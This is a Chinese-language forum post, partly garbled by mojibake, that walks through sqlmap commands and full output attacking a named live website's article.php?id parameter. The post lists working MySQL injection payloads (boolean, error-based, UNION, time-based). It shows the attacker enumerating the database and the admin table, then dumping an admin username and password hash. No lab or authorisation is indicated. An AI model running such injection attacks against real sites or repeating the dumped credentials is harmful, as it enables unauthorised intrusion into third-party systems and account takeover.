��̳ › web app��͸����::��Web App penetration testing�� › sqlmapʵ��ע��mysql

admin ������ 2013-4-4 22:18:49

sqlmapʵ��ע��mysql

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user       /*ע�⣺��ȡ��ǰ�û�����
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:53:54
using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
resuming injection data from session file
resuming back-end DBMS 'mysql 5.0' from session file
testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
fetching current user
current user:    'root@localhost'   
Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'
[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db                  /*��ǰ���ݿ�
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:54:16
using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
resuming injection data from session file
resuming back-end DBMS 'mysql 5.0' from session file
testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
fetching current database
current database:    'wepost'
Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'
[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables-D "wepost"         /*��ȡ��ǰ���ݿ�ı���
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:55:25
using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
resuming injection data from session file
resuming back-end DBMS 'mysql 5.0' from session file
testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
fetching tables for database 'wepost'
the SQL query used returns 6 entries
Database: wepost

+-------------+
| admin       |
| article   |
| contributor |
| idea      |
| image       |
| issue       |
+-------------+
Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'
[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0   /*��ȡadmin�����ֶ���
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin

+----------+-------------+
| Column   | Type      |
+----------+-------------+
| id       | int(11)   |
| password | varchar(32) |
| type   | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql"--dump-C "userid,password"-T "admin" -D "wepost" -v 0      /*��ȡ�ֶ����������
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? y
what's the dictionary's location?
do you want to use common password suffixes? (slow!) y
Database: wepost
Table: admin

+----------------------------------+------------+
| password                         | userid   |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>

�鿴�����汾: sqlmapʵ��ע��mysql